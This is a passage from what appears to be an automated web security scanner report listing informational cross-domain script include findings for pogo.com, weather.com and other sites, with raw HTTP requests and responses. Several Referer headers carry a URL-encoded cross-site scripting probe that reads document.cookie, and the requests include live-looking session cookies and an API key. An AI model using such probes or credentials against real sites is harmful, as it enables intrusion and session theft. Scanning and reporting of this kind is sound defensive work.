Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.ga=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:26:13 GMT
Server: Apache-Coyote/1.1
Content-Length: 29604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

<script src="http://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>

<script src="http://cts.MetricsDirect.com/Conversion.aspx?cpid=6924"></script>
<script language="JavaScript" src="http://tracking.etology.com/?value=1&id=45178"></script>
<script type="text/javascript" src="http://network.adsmarket.com/cpx?script=1&programid=13835&action=lead&p1=998826224"></script>
<script type="text/javascript" src="http://secure.fatracking.com/test-tracking/?page=tracking&id=416G4"></script>
<script src="http://cts.MetricsDirect.com/Conversion.aspx?cpid=972"></script>
...[SNIP]...

17.101. http://www.pogo.com/action/pogo/lightregview.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/action/pogo/lightregview.do

Issue detail

The response dynamically includes the following script from another domain:

http://connect.facebook.net/en_US/all.js

Request

Response

17.102. http://www.pogo.com/all-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/all-games

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/allgames.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=583577?
http://connect.facebook.net/en_US/all.js
http://www.googleadservices.com/pagead/conversion.js
http://www.java.com/js/deployJava.js

Request

Response

17.103. http://www.pogo.com/all-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/all-games

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/allgames.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=242985?
http://connect.facebook.net/en_US/all.js
http://www.googleadservices.com/pagead/conversion.js
http://www.java.com/js/deployJava.js

Request

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:57:53 GMT
Server: Apache-Coyote/1.1
Content-Length: 107601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

<script src="http://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<IE:clientCaps ID='oClientCaps' />

<script src="http://www.java.com/js/deployJava.js"></script>
...[SNIP]...
</div>
<script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/allgames.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=242985?"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

17.104. http://www.pogo.com/arcade-sports-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/arcade-sports-games

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/sportsarcade.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=893248?
http://connect.facebook.net/en_US/all.js
http://www.googleadservices.com/pagead/conversion.js
http://www.java.com/js/deployJava.js

Request

Response

17.105. http://www.pogo.com/arcade-sports-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/arcade-sports-games

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/sportsarcade.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=992891?
http://connect.facebook.net/en_US/all.js
http://www.googleadservices.com/pagead/conversion.js
http://www.java.com/js/deployJava.js

Request

GET /arcade-sports-games HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:59:56 GMT
Server: Apache-Coyote/1.1
Content-Length: 102090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

<script src="http://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<IE:clientCaps ID='oClientCaps' />

<script src="http://www.java.com/js/deployJava.js"></script>
...[SNIP]...
</div>
<script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/sportsarcade.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=992891?"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

17.106. http://www.pogo.com/board-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/board-games

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/board.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=271501?
http://connect.facebook.net/en_US/all.js
http://www.googleadservices.com/pagead/conversion.js
http://www.java.com/js/deployJava.js

Request

Response

17.107. http://www.pogo.com/cash-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/cash-games

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/cash.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=92817?
http://connect.facebook.net/en_US/all.js
http://www.googleadservices.com/pagead/conversion.js
http://www.java.com/js/deployJava.js

Request

GET /cash-games HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:00:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 108489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

<script src="http://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<IE:clientCaps ID='oClientCaps' />

<script src="http://www.java.com/js/deployJava.js"></script>
...[SNIP]...
</div>
<script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/cash.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=92817?"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

17.108. http://www.pogo.com/games/scrabble previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/games/scrabble

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=326364?
http://ad.doubleclick.net/adj/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=2;sz=160x600;ord=326364?
http://connect.facebook.net/en_US/all.js
http://www.java.com/js/deployJava.js

Request

Response

17.109. http://www.pogo.com/oberon/navheader.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/oberon/navheader.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=474944?

Request

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:28:45 GMT
Server: Apache-Coyote/1.1
Content-Length: 11960

<html>
<head>
<script type="text/javascript" src="/v/EFwIAQ/js/std.js"> </script>
<script type="text/javascript" src="/v/CjsBMQ/js/ad.js"> </script>
<script language="Javascript">
setWindowName(
...[SNIP]...
<div class="ad-border"><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=474944?"></script>
...[SNIP]...

17.110. http://www.pogo.com/oberon/navheader.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/oberon/navheader.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=581169?

Request

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:28:24 GMT
Server: Apache-Coyote/1.1
Content-Length: 11936

<html>
<head>
<script type="text/javascript" src="/v/EFwIAQ/js/std.js"> </script>
<script type="text/javascript" src="/v/CjsBMQ/js/ad.js"> </script>
<script language="Javascript">
setWindowName(
...[SNIP]...
<div class="ad-border"><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=581169?"></script>
...[SNIP]...

17.111. http://www.pogo.com/prize/prize.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/prize/prize.do

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/prize.pogo/prizes;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=780687?

Request

Response

17.112. http://www.pogo.com/word-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/word-games

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/word.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=63743?
http://connect.facebook.net/en_US/all.js
http://www.googleadservices.com/pagead/conversion.js
http://www.java.com/js/deployJava.js

Request

Response

17.113. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The response dynamically includes the following script from another domain:

https://connect.facebook.net/en_US/all.js

Request

Response

17.114. https://www.pogo.com/action/pogop/heavyregview.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogop/heavyregview.do

Issue detail

The response dynamically includes the following script from another domain:

https://smarticon.geotrust.com/si.js

Request

GET /action/pogop/heavyregview.do HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: http://www.pogo.com/club-pogo?site=pogo&pageSection=header_club
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536548428-New%7C1297128548428%3B

Response

17.115. https://www.pogo.com/surveys/processZipSubs.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/surveys/processZipSubs.do

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/surveys.pogo/misc;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=416328?

Request

POST /surveys/processZipSubs.do HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: https://www.pogo.com/surveys/surveysofferssubs.do?emv=SOsub_test_heavy_2
Cache-Control: max-age=0
Origin: https://www.pogo.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536610809-New%7C1297128610809%3B
Content-Length: 129

zip=&country=US&chcountry=false&dsaSigned=true&tosSigned=true&submit_subscribe.x=52&submit_subscribe.y=10&submit_subscribeHidden=

Response

17.116. https://www.pogo.com/surveys/surveysofferssubs.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/surveys/surveysofferssubs.do

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/surveys.pogo/misc;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=412952?

Request

Response

17.117. https://www.pogo.com/surveys/surveysofferssubs.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/surveys/surveysofferssubs.do

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/surveys.pogo/misc;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=966614?

Request

GET /surveys/surveysofferssubs.do HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: https://www.pogo.com/surveys/processZipSubs.do
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536623314-New%7C1297128623314%3B

Response

17.118. http://www.rockband.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rockband.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://player.play.it/player/launchPlayer.js
http://www.google.com/jsapi?key=ABQIAAAAFcj74dOEcUS3x01IiAvgaRQhRauPe20DzTOsibbVqG_tWEdHJhSZeK_cCa-WBco6ZJdruyxK7feAtA

Request

GET / HTTP/1.1
Host: www.rockband.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-MyHeader: (null)
X-Duration: D=677765 microseconds
Content-Type: text/html; charset=utf-8
Expires: Sun, 09 Jan 2011 02:53:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 09 Jan 2011 02:53:52 GMT
Content-Length: 19192
Connection: close
Set-Cookie: rb_s=3a49e7e697e2c5f07de70a8b370be1bb; path=/

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<![endif]-->

                   <script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAFcj74dOEcUS3x01IiAvgaRQhRauPe20DzTOsibbVqG_tWEdHJhSZeK_cCa-WBco6ZJdruyxK7feAtA"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://player.play.it/player/launchPlayer.js"></script>
...[SNIP]...

       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

17.119. http://www.slidedeck.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.slidedeck.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js?ver=1.4.4
http://platform.twitter.com/widgets.js
http://www.hellobar.com/hellobar.js

Request

GET / HTTP/1.1
Host: www.slidedeck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.120. http://www.thedailynews.cc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thedailynews.cc
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://netweather.accuweather.com/adcbin/netWeather/runNetWeather.js
http://netweather.accuweather.com/adcbin/netWeather/setNetWeather.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.thedailynews.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 09 Jan 2011 01:20:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Sat, 08 Jan 2011 01:20:38 GMT
Set-Cookie: UID=15824293; expires=Mon, 31-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSASAASQB=KCNAOIEADCPKOCPKACDIKMJH; path=/
Cache-control: private

<html>
<head>
   <META HTTP-EQUIV="Expires" CONTENT="0">

<META NAME="GENERATOR" Content=" 1up! Software ( www.going1up.com ) News Site Software 5.5">

<META NA
...[SNIP]...
<META NAME="keywords" CONTENT="">

<script src="http://netWeather.accuweather.com/adcbin/netWeather/runNetWeather.js" language="JavaScript" type="text/javascript"></script>
<script src="http://netWeather.accuweather.com/adcbin/netWeather/setNetWeather.js" language="JavaScript" type="text/javascript"></script>
...[SNIP]...
</SCRIPT>
   <script src="http://netWeather.accuweather.com/adcbin/netWeather/setNetWeather.js" language="JavaScript" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

17.121. http://www.thedailynews.cc/siteimages/featurephoto/cleardot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thedailynews.cc
Path:	/siteimages/featurephoto/cleardot.gif

Issue detail

The response dynamically includes the following script from another domain:

http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js

Request

GET /siteimages/featurephoto/cleardot.gif HTTP/1.1
Host: www.thedailynews.cc
Proxy-Connection: keep-alive
Referer: http://www.thedailynews.cc/?a39c5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E16e0513e3bf=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=15824504; ASPSESSIONIDSASAASQB=GDABOIEAAGDAJHOEPLOAHJDD

Response

HTTP/1.1 404
Date: Sun, 09 Jan 2011 01:42:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2665
Content-Type: text/html
Cache-control: private

<html>
<head>
<title>Page Not Found - The Daily News</title>
<style type="text/css">
#goog-wm
{
color:#000000;
font-family
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js">
</script>
...[SNIP]...

17.122. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_1.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thedailynews.cc
Path:	/siteimages/featurephoto/tabs/Photo-NavigationBar_1.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js

Request

GET /siteimages/featurephoto/tabs/Photo-NavigationBar_1.jpg HTTP/1.1
Host: www.thedailynews.cc
Proxy-Connection: keep-alive
Referer: http://www.thedailynews.cc/?a39c5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E16e0513e3bf=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=15824504; ASPSESSIONIDSASAASQB=GDABOIEAAGDAJHOEPLOAHJDD

Response

HTTP/1.1 404
Date: Sun, 09 Jan 2011 01:42:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2665
Content-Type: text/html
Cache-control: private

<html>
<head>
<title>Page Not Found - The Daily News</title>
<style type="text/css">
#goog-wm
{
color:#000000;
font-family
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js">
</script>
...[SNIP]...

17.123. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thedailynews.cc
Path:	/siteimages/featurephoto/tabs/Photo-NavigationBar_2.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js

Request

GET /siteimages/featurephoto/tabs/Photo-NavigationBar_2.jpg HTTP/1.1
Host: www.thedailynews.cc
Proxy-Connection: keep-alive
Referer: http://www.thedailynews.cc/?a39c5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E16e0513e3bf=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=15824504; ASPSESSIONIDSASAASQB=GDABOIEAAGDAJHOEPLOAHJDD

Response

17.124. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_3.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thedailynews.cc
Path:	/siteimages/featurephoto/tabs/Photo-NavigationBar_3.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js

Request

GET /siteimages/featurephoto/tabs/Photo-NavigationBar_3.jpg HTTP/1.1
Host: www.thedailynews.cc
Proxy-Connection: keep-alive
Referer: http://www.thedailynews.cc/?a39c5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E16e0513e3bf=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=15824504; ASPSESSIONIDSASAASQB=GDABOIEAAGDAJHOEPLOAHJDD

Response

17.125. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_4.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thedailynews.cc
Path:	/siteimages/featurephoto/tabs/Photo-NavigationBar_4.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js

Request

GET /siteimages/featurephoto/tabs/Photo-NavigationBar_4.jpg HTTP/1.1
Host: www.thedailynews.cc
Proxy-Connection: keep-alive
Referer: http://www.thedailynews.cc/?a39c5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E16e0513e3bf=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=15824504; ASPSESSIONIDSASAASQB=GDABOIEAAGDAJHOEPLOAHJDD

Response

17.126. http://www.weather.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.weather.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s.imwx.com/global/common/elements/javascript/a21-2_2.js
http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js
http://s.imwx.com/v.20101206.171952/js/wx-a21-plugthis.js

Request

GET / HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
SVRNAME: wxii2x06
Cache-Control: max-age=30
Expires: Sun, 09 Jan 2011 01:44:21 GMT
Content-Language: en-US
Vary: Accept-Encoding
